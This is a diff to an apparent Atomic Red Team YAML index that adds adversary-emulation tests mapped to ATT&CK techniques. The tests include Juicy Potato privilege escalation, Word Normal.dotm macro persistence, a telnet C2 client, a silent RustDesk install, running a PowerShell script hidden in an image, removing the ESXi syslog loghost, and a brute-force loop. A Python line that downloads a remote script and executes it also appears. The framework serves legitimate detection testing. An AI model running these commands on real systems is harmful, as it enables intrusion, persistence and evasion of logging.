+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
   T1556.008:
     technique:
       modified: '2023-05-04T18:02:51.318Z'
@@ -38898,6 +39112,53 @@ privilege-escalation:
           '
         name: powershell
         elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
   T1098.001:
     technique:
       modified: '2023-10-03T17:37:24.011Z'
@@ -50031,7 +50292,49 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1059
+    atomic_tests:
+    - name: AutoIt Script Execution
+      auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
+      description: 'An adversary may attempt to execute suspicious or malicious script
+        using AutoIt software instead of regular terminal like powershell or cmd.
+        Calculator will popup when the script is executed successfully.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AutoIt executable file must exist on disk at the specified location
+          (#{autoit_path})
+
+          '
+        prereq_command: |
+          if(Test-Path "#{autoit_path}") {
+              exit 0
+          } else {
+              exit 1
+          }
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+          $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+          Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+          Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+      input_arguments:
+        script_path:
+          description: AutoIt Script Path
+          type: path
+          default: PathToAtomicsFolder\T1059\src\calc.au3
+        autoit_path:
+          description: AutoIt Executable File Path
+          type: path
+          default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
+      executor:
+        command: 'Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+
+          '
+        name: powershell
   T1609:
     technique:
       modified: '2023-04-15T16:03:19.642Z'
@@ -52230,7 +52533,8 @@ execution:
           which_python=$(which python || which python3 || which python3.9 || which python2)
           $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
         name: sh
-        cleanup_command: "rm #{payload_file_name} \n"
+        cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
+          nul\n"
     - name: Execute Python via scripts
       auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
       description: Create Python file (.py) that downloads and executes shell script
@@ -54853,7 +55157,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -54928,7 +55232,24 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
   T1574.011:
     technique:
       modified: '2023-03-30T21:01:38.651Z'
@@ -60750,7 +61071,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -60802,7 +61123,104 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-    atomic_tests: []
+      identifier: T1137.001
+    atomic_tests:
+    - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
+        PowerShell
+      auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+      description: 'Injects a Macro in the Word default template "Normal.dotm" and
+        makes it execute each time that Word is opened. In this test, the Macro creates
+        a sheduled task to open Calc.exe every evening.
+
+        '
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Word must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Word.Application" | Out-Null
+            Stop-Process -Name "winword"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+          to meet this requirement"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Registry setting to \"Trust access to the VBA project object model\"
+          in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file
+          will be created if Registry setting did not already exist or if it was set
+          to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey
+          -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical
+          operation to: if the value of the key/value is 1, do nothing - \n# if the
+          value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create
+          the value and flag2\nif ($value -eq \"1\") \n{\n  Write-Host \"The registry
+          value '$registryValue' already exists with the required setting.\"\n}   \n
+          \ elseif ($value -eq \"0\") \n{\n  Write-Host \"The registry value was set
+          to 0, temporarily changing to 1.\"\n  New-ItemProperty -Path $registryKey
+          -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n
+          \ echo \"flag1\" > $flagPath1\n} \n  else \n{\n  Write-Host \"The registry
+          value '$registryValue' does not exist, temporarily creating it.\"\n  New-ItemProperty
+          -Path $registryKey -Name $registryValue -Value $registryData -PropertyType
+          DWORD -Force | Out-Null\n  echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName
+          Microsoft.Office.Interop.Word\n# Define the path of copied normal template
+          for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination
+          $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a
+          scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n
+          \ Sub AutoExec()\n  Dim applicationPath As String\n  Dim taskName As String\n
+          \ Dim runTime As String\n  Dim schTasksCmd As String\n  applicationPath
+          = \"C:\\Windows\\System32\\calc.exe\"\n  taskName = \"OpenCalcTask\"\n  runTime
+          = \"20:04\"\n  schTasksCmd = \"schtasks /create /tn \"\"\" & taskName &
+          \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime
+          & \" /f\"\n  Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n  End Sub\n\"@\n#
+          Create a new instance of Word.Application\n$word = New-Object -ComObject
+          Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n#
+          Open the document\n$document = $word.Documents.Open($docPath)\n# Access
+          the VBA project of the document\n$vbaProject = $document.VBProject\n# Add
+          a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1)
+          # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n#
+          Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n#
+          Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule)
+          | Out-Null\n"
+        cleanup_command: "# Registry setting to \"Trust access to the VBA project
+          object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines
+          the path each flag file created depending on the original registry state\n$flagPath1
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\"
+          /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif
+          (Test-Path $copyPath)\n{\n  #Delete the injected template\n  Remove-Item
+          -Force $docPath -ErrorAction SilentlyContinue\n  # Restore the original
+          template\n  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction
+          SilentlyContinue\n  Write-Host \"The original template has been restored\"\n}\n
+          \ else\n{\n  Write-Host \"The original template is present\"\n}\n#Restore
+          the original state of the registry key\nif (Test-Path $flagPath1) \n{\n
+          \ # The value was originally 0, set back to 0\n  New-ItemProperty -Path
+          $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD
+          -Force | Out-Null\n  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n
+          \ Write-Host \"The original registry state has been restored\"\n} \n  elseif
+          (Test-Path $flagPath2)\n{\n  #The value did not previously exist, delete
+          the value\n  Remove-ItemProperty -Path $registryKey -Name $registryValue
+          | Out-Null\n  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue
+          | Out-Null\n  Write-Host \"The original registry state has been restored\"\n}\n
+          \ else \n{\n  # The value was already 1, do nothing\n  Write-Host \"The
+          value $registryValue already existed in $registryKey.\"\n}\n"
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -70468,7 +70886,46 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1071
+    atomic_tests:
+    - name: Telnet C2
+      auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
+      description: 'An adversary may establish telnet communication from compromised
+        endpoint to command and control (C2) server to be able to operate more attack
+        on objectives.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Command and Control (C2) server cam be established by running
+          PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with
+          specified IP that must be reachable by client (telnet_client.exe)
+
+          '
+        prereq_command: |
+          $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+          if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+        get_prereq_command: 'Write-Host "Setup C2 server manually"
+
+          '
+      input_arguments:
+        server_ip:
+          description: C2 server IP or URL
+          type: url
+          default: 127.0.0.1
+        client_path:
+          description: Client agent path
+          type: url
+          default: PathToAtomicsFolder\T1071\bin\telnet_client.exe
+        server_port:
+          description: C2 server port
+          type: Integer
+          default: 23
+      executor:
+        command: "#{client_path} #{server_ip} --port #{server_port}\n"
+        name: powershell
   T1219:
     technique:
       modified: '2023-09-28T16:23:51.194Z'
@@ -70847,6 +71304,22 @@ command-and-control:
           '
         name: powershell
         elevation_required: true
+    - name: RustDesk Files Detected Test on Windows
+      auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e
+      description: "An adversary may attempt to trick the user into downloading RustDesk
+        and use this to maintain access to the machine. \nDownload of RustDesk installer
+        will be at the destination location when successfully executed.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+          Start-Process -FilePath $file "/S"
+        cleanup_command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Remove-Item $file1 -ErrorAction Ignore
+        name: powershell
   T1659:
     technique:
       modified: '2023-10-01T02:28:45.147Z'
@@ -72785,9 +73258,9 @@ command-and-control:
           '
         get_prereq_command: |
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+          Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
           Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
       executor:
@@ -73815,7 +74288,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -73837,7 +74310,156 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-    atomic_tests: []
+      identifier: T1001.002
+    atomic_tests:
+    - name: Steganographic Tarball Embedding
+      auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+      description: "This atomic test, named \"Steganographic Tarball Embedding\",
+        simulates the technique of data obfuscation via steganography by embedding
+        a tar archive file (tarball) \nwithin an image.\n\nThe test begins by ensuring
+        the availability of the image file and the tarball file containing data .
+        It then generates random passwords and saves them to a \nfile. Subsequently,
+        the tarball file is created, containing the passwords file. The test executor
+        command reads the contents of the image \nfile and the tarball file as byte
+        arrays and appends them together to form a new image file. This process effectively
+        embeds the tarball \nfile within the image, utilizing steganography techniques
+        for data obfuscation.\n\nThis atomic test simulates the technique of data
+        obfuscation via steganography, enabling attackers to clandestinely transfer
+        files across systems undetected. \nBy embedding the tarball file within the
+        image, adversaries can obscure their activities, facilitating covert communication
+        and data exfiltration.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Image file which will be downloaded to be used to hide data
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+        tar_file:
+          description: Tarz file containing random passwords
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002.tarz"
+        new_image_file:
+          description: new image file ready for extraction
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002New.jpg"
+        passwords_file:
+          description: Text file containing random passwords
+          type: path
+          default: "$env:TEMP\\random_passwords.txt"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: 'File to hide within tarz file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: "Write-Output \"Generating random passwords and saving
+          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
+          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
+          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+      - description: "Tarz file to embed in image must exist \n"
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount
+          0 | Set-Content "#{new_image_file}" -Encoding byte
+
+          '
+        cleanup_command: |
+          Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+          Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+    - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+      auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+      description: "This atomic test demonstrates the technique of data obfuscation
+        via steganography, where a PowerShell script is concealed within an image
+        file. \nThe PowerShell script is embedded using steganography techniques,
+        making it undetectable by traditional security measures. The script is hidden
+        \nwithin the pixels of the image, enabling attackers to covertly transfer
+        and execute malicious code across systems.\n\nThe test begins by ensuring
+        the availability of the malicious image file and the Extract-Invoke-PSImage
+        script. The test proceeds to extract the hidden \nPowerShell script (decoded.ps1)
+        from the image file using the Extract-Invoke-PSImage tool. The extracted script
+        is then decoded from base64 encoding and saved as a \nseparate PowerShell
+        (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.\n\nIn
+        the case of this atomic test, the malicious image file which is downloaded
+        has the powershell command Start-Process notepad embedded within in base64.
+        This\nis done to emulate an attackers behaviour in the case they were to execute
+        malware embedded within the image file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Malicious Image file which will be downloaded
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+        psimage_script:
+          description: Extract-Invoke-PSImage Script downloaded
+          type: path
+          default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: 'Extract-Invoke-PSImage must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "cd \"PathToAtomicsFolder\\ExternalPayloads\\\"\nImport-Module .\\Extract-Invoke-PSImage.ps1\n$extractedScript=Extract-Invoke-PSImage
+          -Image \"#{image_file}\" -Out \"$HOME\\result.ps1\"\n$scriptContent = Get-Content
+          \"$HOME\\result.ps1\" -Raw\n$base64Pattern = \"(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])\"\n$base64Strings
+          = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value
+          }\n$base64Strings | Set-Content \"$HOME\\decoded.ps1\"\n$decodedContent
+          = Get-Content \"$HOME\\decoded.ps1\" -Raw\n$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))\n$textPattern
+          = '^.+'  \n$textMatches = [regex]::Matches($decodedText, $textPattern) |
+          ForEach-Object { $_.Value }\n$scriptPath = \"$HOME\\textExtraction.ps1\"\n$textMatches
+          -join '' | Set-Content -Path $scriptPath\n. \"$HOME\\textExtraction.ps1\"\n"
+        cleanup_command: "Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction
+          Ignore\nRemove-Item -Path \"$HOME\\result.ps1\" -Force -ErrorAction Ignore
+          \nRemove-Item -Path \"$HOME\\textExtraction.ps1\" -Force -ErrorAction Ignore\nRemove-Item
+          -Path \"$HOME\\decoded.ps1\" -Force -ErrorAction Ignore\n"
   T1008:
     technique:
       x_mitre_platforms:
@@ -74546,6 +75168,65 @@ collection:
         cleanup_command: 'rm -rf #{input_folder}'
         name: bash
         elevation_required: false
+    - name: ESXi - Remove Syslog remote IP
+      auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+      description: 'An adversary may edit the syslog config to remove the loghost
+        in order to prevent or redirect logs being received by SIEM.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: Username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "# Extract line with IP address from the syslog configuration output\n#{plink_file}
+          -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt
+          | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n#
+          Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username}
+          -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n#
+          Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath
+          = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath
+          -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n    Write-Host
+          \"The content is $fileContent\"\n    Write-Host \"The file is empty\"\n}
+          else {\n    # Use a regular expression to extract IP addresses\n    $ipAddresses
+          = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n
+          \   \n    $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n
+          \   $output | Out-File -FilePath $outputFilePath -Encoding ascii\n    \n
+          \   Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n"
+        cleanup_command: |
+          # Re-add the initially extracted IP
+          #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+          rm c:\temp\loghost_ip.txt
+          rm c:\temp\loghost.txt
+        name: powershell
+        elevation_required: true
   T1113:
     technique:
       modified: '2023-03-30T21:01:39.967Z'
@@ -81852,6 +82533,46 @@ credential-access:
         cleanup_command: 'rmuser -y art
 
           '
+    - name: ESXi - Brute Force Until Account Lockout
+      auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+      description: |
+        An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+        In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        lockout_threshold:
+          description: Specify the account lockout threshold configured on the ESXI
+            management server
+          type: string
+          default: '5'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: |
+          $lockout_threshold = [int]"#{lockout_threshold}"
+          for ($var = 1; $var -le $lockout_threshold; $var++) {
+            #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+            }
+        name: powershell
+        elevation_required: false
   T1003:
     technique:
       x_mitre_platforms:
@@ -82399,44 +83120,51 @@ credential-access:
         elevation_required: true
     - name: Registry parse with pypykatz
